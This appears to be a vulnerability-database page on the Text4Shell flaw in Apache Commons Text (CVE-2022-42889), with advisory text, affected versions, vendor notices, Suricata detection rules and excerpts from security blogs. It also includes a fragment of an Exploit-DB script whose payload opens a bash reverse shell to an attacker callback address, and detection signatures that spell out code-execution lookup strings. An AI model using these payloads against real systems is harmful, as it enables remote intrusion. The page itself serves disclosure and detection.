CVE-2022-42889
Published: 2022-10-13
Priority: P192 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 99.93% (100.0th percentile)
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are:
- "script" - execute expressions using the JVM script execution engine (javax.script)
- "dns" - resolve dns records
- "url" - load values from urls, including from remote servers

Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | commons_text | >= 1.5 < 1.10.0 | 1.10.0 |
| apache_software_foundation | apache_commons_text | >= 1.5 < Apache Commons Text* | Apache Commons Text* |
| apache_software_foundation | apache_commons_text | unspecified – 1.9 | — |
| debian | commons-text | < commons-text 1.10.0-1 (bookworm) | commons-text 1.10.0-1 (bookworm) |
| juniper | security_threat_response_manager | < 7.5.0 | 7.5.0 |
| juniper | security_threat_response_manager | — | — |
| paloalto | cortex_data | — | — |
| paloalto | cortex_xdr | — | — |
| paloalto | cortex_xpanse | — | — |
| paloalto | cortex_xsoar | — | — |
| paloalto | globalprotect | — | — |
| paloalto | pan-os | — | — |
| paloalto | prisma_access | — | — |
| paloalto | prisma_cloud | — | — |
| paloalto | prisma_sd | — | — |
Detection & IOCs (extracted from sources)
- Detect the interpolation payload pattern '${script:...}', '${dns:...}', or '${url:...}' in HTTP request parameters or body; these are the three dangerous lookup prefixes exploited in CVE-2022-42889.
- Zscaler IPS signature 'Apache.Exploit.CVE-2022-42889' can be used for network-level detection of exploit attempts.
- Zscaler rule ID 944130 (Suspicious Java Class Detected) covers deserialization-based exploitation attempts related to this CVE.
- Zscaler rule ID 932130 (Unix Shell Expression Found) covers RCE payload detection for this CVE.
- The standard exploit payload format is '${prefix:name}'; monitor application inputs and logs for this interpolation pattern, especially with prefixes 'script', 'dns', and 'url'.
- Affected versions are strictly 1.5 through 1.9; version 1.10.0 disables the dangerous interpolators by default and is the recommended fix.
- This CVE is considered less broadly exploitable than Log4Shell because the Apache Commons Text package and the StringSubstitutor interpolator are not widely used in production environments.
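CVSS provenance
| Source | Score | Severity | Vector |
|---|---|---|---|
| nvd (v3.1) | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| osv | 9.8 | CRITICAL | |
| vulncheck | 9.8 | CRITICAL | |
| vendor_debian | 9.8 | CRITICAL | |
| vendor_oracle | 9.8 | CRITICAL | |
| vendor_redhat | 9.8 | CRITICAL | |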
Oracle
Oracle Oracle HealthCare Applications Risk Matrix: FHIR (Apache Commons Text) — CVE-2022-42889
vendor_oracle·2024-04-15·CVSS 9.8
CVE-2022-42889 [CRITICAL] Oracle Oracle HealthCare Applications Risk Matrix: FHIR (Apache Commons Text) — CVE-2022-42889
Oracle Oracle HealthCare Applications Risk Matrix: FHIR (Apache Commons Text) vulnerability
CVE: CVE-2022-42889
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuapr2024 (APR 2024)
Oracle
Oracle Oracle Financial Services Applications Risk Matrix: Application (Apache Commons Text) — CVE-2022-42889
vendor_oracle·2023-04-15·CVSS 9.8
CVE-2022-42889 [CRITICAL] Oracle Oracle Financial Services Applications Risk Matrix: Application (Apache Commons Text) — CVE-2022-42889
Oracle Oracle Financial Services Applications Risk Matrix: Application (Apache Commons Text) vulnerability
CVE: CVE-2022-42889
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuapr2023 (APR 2023)
Oracle
Oracle Oracle Communications Applications Risk Matrix: PSR Designer (Apache Commons Text) — CVE-2022-42889
vendor_oracle·2023-01-15·CVSS 9.8
CVE-2022-42889 [CRITICAL] Oracle Oracle Communications Applications Risk Matrix: PSR Designer (Apache Commons Text) — CVE-2022-42889
Oracle Oracle Communications Applications Risk Matrix: PSR Designer (Apache Commons Text) vulnerability
CVE: CVE-2022-42889
CVSS: 9.8
Protocol: HTTPS
Remote exploit: Yes
Affected versions: Network
Advisory: cpujan2023 (JAN 2023)
Palo Alto
CVE-2022-42889 Impact of Apache Text Commons Vulnerability CVE-2022-42889
vendor_paloalto·2022-11-09·CVSS 9.8
CVE-2022-42889 [CRITICAL] CWE-94 CVE-2022-42889 Impact of Apache Text Commons Vulnerability CVE-2022-42889
Palo Alto Networks has evaluated the Apache Commons Text library vulnerability CVE-2022-42889, known as Text4Shell, for all products and services. The Palo Alto Networks Product Security Assurance team has confirmed that all products and services are not impacted by this vulnerability.
Red Hat
apache-commons-text: variable interpolation RCE
vendor_redhat·2022-10-13·CVSS 9.8
CVE-2022-42889 [CRITICAL] CWE-94 apache-commons-text: variable interpolation RCE
Debian
CVE-2022-42889: commons-text - Apache Commons Text performs variable interpolation, allowing properties to be d...
vendor_debian·2022·CVSS 9.8
CVE-2022-42889 [CRITICAL] CVE-2022-42889: commons-text - Apache Commons Text performs variable interpolation, allowing properties to be d...
OSV
CVE-2022-42889: Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded
osv·2022-10-13·CVSS 9.8
CVE-2022-42889 [CRITICAL] CVE-2022-42889: Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded
GHSA
Arbitrary code execution in Apache Commons Text
ghsa·2022-10-13
CVE-2022-42889 [CRITICAL] CWE-94 Arbitrary code execution in Apache Commons Text
OSV
Arbitrary code execution in Apache Commons Text
osv·2022-10-13
CVE-2022-42889 [CRITICAL] Arbitrary code execution in Apache Commons Text
VulnCheck
Apache commons_text Improper Control of Generation of Code ('Code Injection')
vulncheck·2022·CVSS 9.8
CVE-2022-42889 [CRITICAL] Apache commons_text Improper Control of Generation of Code ('Code Injection')
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound)"; flow:established,to_server; http.uri; content:"|3d 24 7b|url|3a|UTF|2d|8|3a|http|3a 2f|"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,sysdig.com/blog/cve-2022-42889-text4shell; classtype:attempted-admin; sid:2039468; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_10_24;)
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Outbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Outbound)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Outbound)"; flow:established,to_server; http.uri; content:"|3d 24 7b|script|3a|javascript|3a|java|2e|lang|2e|Runtime|2e|getRuntime|28 29 2e|exec|28|"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,sysdig.com/blog/cve-2022-42889-text4shell; classtype:attempted-admin; sid:2039465; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updat
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Outbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Outbound)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Outbound)"; flow:established,to_server; http.uri; content:"|24 7b|java|3a|version|7d 20 24 7b|script|3a|JEXL|3a 27 27 2e|getClass|28 29 2e|forName|28 27|java|2e|lang|2e|Runtime|27 29 2e|getRuntime|28 29 2e|exec"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,twitter.com/pwntester/status/1582321752566161409; classtype:attempted-admin; sid:2039471; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severit
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Outbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Outbound)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Outbound)"; flow:established,to_server; http.uri; content:"|3d 24 7b|dns|3a|address|7c|"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,sysdig.com/blog/cve-2022-42889-text4shell; classtype:attempted-admin; sid:2039467; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_10_24;)
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Inbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Inbound)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Inbound)"; flow:established,to_server; http.uri; content:"|24 7b|java|3a|version|7d 20 24 7b|script|3a|JEXL|3a 27 27 2e|getClass|28 29 2e|forName|28 27|java|2e|lang|2e|Runtime|27 29 2e|getRuntime|28 29 2e|exec"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,twitter.com/pwntester/status/1582321752566161409; classtype:attempted-admin; sid:2039470; rev:3; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidenc
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound)"; flow:established,to_server; http.uri; content:"|3d 24 7b|url|3a|UTF|2d|8|3a|http|3a 2f|"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,sysdig.com/blog/cve-2022-42889-text4shell; classtype:attempted-admin; sid:2039469; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Client_Endpoint, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_10_24;)
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Inbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Inbound)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Inbound)"; flow:established,to_server; http.uri; content:"|3d 24 7b|script|3a|javascript|3a|java|2e|lang|2e|Runtime|2e|getRuntime|28 29 2e|exec|28|"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,sysdig.com/blog/cve-2022-42889-text4shell; classtype:attempted-admin; sid:2039464; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severity Major, tag Description_Generated_By
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Inbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Inbound)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Inbound)"; flow:established,to_server; http.uri; content:"|3d 24 7b|dns|3a|address|7c|"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,sysdig.com/blog/cve-2022-42889-text4shell; classtype:attempted-admin; sid:2039466; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_10_24;)
Exploit-DB
Apache Commons Text 1.10.0 - Remote Code Execution
exploitdb·2025-04-18·CVSS 9.8
CVE-2022-42889 [CRITICAL] Apache Commons Text 1.10.0 - Remote Code Execution
---
# Exploit Title: Apache Commons Text 1.10.0 - Remote Code Execution
(Text4Shell - POST-based)
# Date: 2025-04-17
# Exploit Author: Arjun Chaudhary
# Vendor Homepage: https://commons.apache.org/proper/commons-text/
# Software Link:https://repo1.maven.org/maven2/org/apache/commons/commons-text/
# Version: Apache Commons Text ")
print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444")
sys.exit(1)
if len(sys.argv) != 4:
usage()
target_ip = sys.argv[1]
callback_ip = sys.argv[2]
callback_port = sys.argv[3]
raw_payload = (
f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
)
encoded_payload = urllib.parse.quote(r
Metasploit
Apache Commons Text RCE
metasploit
This exploit takes advantage of the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to Remote Code Execution. This is due to a logic flaw that makes the "script", "dns" and "url" lookup keys interpolated by default, as opposed to what it should be, according to the documentation of the StringLookupFactory class. Those keys allow an attacker to execute arbitrary code via lookups primarily using the "script" key. In order to exploit the vulnerabilities, the following requirements must be met:
- Run a version of Apache Commons Text from version 1.5 to 1.9
- Use the StringSubstitutor interpolator
- Target should run JDK < 15
Nuclei
Text4Shell - Remote Code Execution
nuclei·CVSS 9.8
CVE-2022-42889 [CRITICAL] Text4Shell - Remote Code Execution
Qualys
The January 2023 Oracle Critical Patch Update
blogs_qualys·2023-01-18
This Oracle Critical Patch Update contains a group of patches for multiple security vulnerabilities that address 327 new security patches. Some of the vulnerabilities addressed this month impact various products. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. We urge customers to apply these time-sensitive Oracle Critical Patch Updates.
During Q1 2023 Oracle Critical Patch Update, the Oracle Communications product suite recorded the highest number of patches at 79, constituting 24% of the total patches released. The Oracle Fusion Middleware and Oracle Communications Applications product lines followed, with 50 and 39 patches, respe
Qualys
November 2022 Patch Tuesday | Microsoft Releases 65 New Vulnerabilities With 10 Critical; Adobe Releases Zero Advisories (for the First Time in Six Years).
blogs_qualys·2022-11-08·CVSS 7.5
[HIGH] November 2022 Patch Tuesday | Microsoft Releases 65 New Vulnerabilities With 10 Critical; Adobe Releases Zero Advisories (for the First Time in Six Years).
Qualys
Text4Shell: Detect, Prioritize and Remediate The Risk Across On-premise, Cloud, Container Environment Using Qualys Platform
blogs_qualys·2022-10-27·CVSS 9.8
[CRITICAL] Text4Shell: Detect, Prioritize and Remediate The Risk Across On-premise, Cloud, Container Environment Using Qualys Platform
On 2022-10-13, Apache Security Team disclosed a critical vulnerability with CVE-2022-42889 affecting the popular Apache Commons Text library. This vulnerability is popularly named “Text4Shell” which when exploited can allo
Qualys
CVE-2022-42889: Detect Text4Shell via Qualys Container Security
blogs_qualys·2022-10-25·CVSS 9.8
CVE-2022-42889 [CRITICAL] CVE-2022-42889: Detect Text4Shell via Qualys Container Security
A new critical vulnerability CVE-2022-42889 (Text4Shell) in Apache Commons Text library was reported by Alvaro Muñoz.
The vulnerability, when exploited could result in remote code execution (RCE) applied to untrusted input due to insecure interpolation defaults. As a result, this CVE is rated at CVSS v3 score of 9.8.
The affected Apache Commons Text versions are 1.5 to 1.9 and it has been patched in version 1.10. When this article is published, this CVE is not expected to be highly widespread as compared to the Log4Shell and Spring4Shell-related CVEs. The fact is that the Apache Common Text package and the use of the specific function StringSubstitutor interpolator are not widel
Checkpoint
24th October – Threat Intelligence Report
blogs_checkpoint·2022-10-24
CVE-2022-22954 24th October – Threat Intelligence Report
## 24th October – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 24th October, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Iranian Hacktivist group ‘Black Reward’ claim to have breached Iran’s government and exfiltrated data related to the country’s nuclear program. After the group’s demands to release political prisoners were not met, the group eventually released 50GB of allegedly sensitive data. Iran’s nuclear agency confirmed the breach,
Zscaler
Apache Commons Text Remote Code Execution Vulnerability
blogs_zscaler·2022-10-18·CVSS 9.8
[CRITICAL] Apache Commons Text Remote Code Execution Vulnerability
Zscaler
CISO Monthly Roundup, October 2022: ThreatLabz Data Loss Report; PHP Ducktail infostealer; LilithBot malware; vulnerabilities in OpenSSL, Microsoft, and Apache; Windows CLFS zero-day | CXO Revolutiona
blogs_zscaler
## CISO Monthly Roundup, October 2022: ThreatLabz Data Loss Report; PHP Ducktail infostealer; LilithBot malware; vulnerabilities in OpenSSL, Microsoft, and Apache; Windows CLFS zero-day
Deepen Desai
Contributor
Zscaler
## Nov 2, 2022
The CISO Monthly Roundup (formerly the ThreatLabz monthly report) provides the latest threat research and relevant insights on cyber-related subjects from the ThreatLabz team and Deepen Desai, CISO at Zscaler.
The CISO Monthly Roundup (formerly the ThreatLabz monthly report) provides the latest threat research from Deepen Desai and the ThreatLabz team, along with insights on other cyber-related subjects. In October, ThreatLabz released their 2022 Data Loss Report, researched a PHP version of Ducktail infostealer, and analyzed LilithBot malware. My team a
Huntress
CVE-2022-42889 (Text4Shell): Analysis, Detection & Prevention | Huntress
blogs_huntress·CVSS 9.8
CVE-2022-42889 [CRITICAL] CVE-2022-42889 (Text4Shell): Analysis, Detection & Prevention | Huntress
## CVE-2022-42889 Vulnerability
Published: 12/05/2025
Written by: Nadine Rozell
## What is CVE-2022-42889 Vulnerability?
CVE-2022-42889, widely known as "Text4Shell," is a critical remote code execution (RCE) vulnerability found in the popular Apache Commons Text library. If that sounds alarmingly familiar, it's because it shares a similar vibe with the infamous Log4Shell vulnerability. Apache Commons Text is a Java library used for, you guessed it, working with text. The vulnerability stems from how the library handles variable interpolation, which is a fancy way of saying it processes strings that can dynamically pull in and expand other values.
The problem is that some of the default "lookups" (the mechanisms that find and replace these variables) could be tricked into executing c
- http://packetstormsecurity.com/files/171003/OX-App-Suite-Cross-Site-Scripting-Server-Side-Request-Forgery.html
- http://packetstormsecurity.com/files/176650/Apache-Commons-Text-1.9-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2023/Feb/3
- http://www.openwall.com/lists/oss-security/2022/10/13/4
- http://www.openwall.com/lists/oss-security/2022/10/18/1
- https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0022
- https://security.gentoo.org/glsa/202301-05
- https://security.netapp.com/advisory/ntap-20221020-0004/
2022-10-13
Published
Exploited in the wild